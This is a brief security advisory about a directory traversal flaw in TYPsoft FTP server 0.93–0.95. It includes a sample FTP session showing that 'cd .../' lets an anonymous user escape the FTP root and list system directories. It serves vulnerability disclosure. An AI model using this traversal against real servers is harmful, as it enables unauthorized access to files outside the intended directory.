COMMAND

    TYPsoft FTP server

SYSTEMS AFFECTED

    TYPsoft FTP server v0.93..0.95 (others?)

PROBLEM

    SosPiro found  following.   TYPsoft FTP  Server is  a freeware ftp
    server.  An attacker with  anonymous access to the ftp  server can
    break out of the  ftp root using the  dot vulnerability.  This  is
    the problem:

        >ftp 127.0.0.1
        220 TYPsoft  FTP server 0.95 ready...
        User (127.0.0.1:(none)): anonymous
        331  Password required for anonymous.
        Password:
        230 User anonymous logged in.
        ftp>pwd
        257  " / "  is current directory.
        ftp>cd ../
        501 CWD failed. Cannot  accept relative path using dot  notation.
        ftp> cd .../
        250 CWD command successful. "/.../" is current directory.
        ftp>dir
        drw-rw-rw-             1 ftp           ftp                 0 May   01 19:44
        FTP Server
        drw-rw-rw-             1 ftp           ftp                 0 May   01 19:47
        temp
        drw-rw-rw-             1 ftp           ftp                 0 Dec    24 2000
        windows
        .....
        226 Transfer complete.
        ftp>

SOLUTION

    TYPsoft staff was contacted on Tuesday 1 May,2001 and no reply was
    received.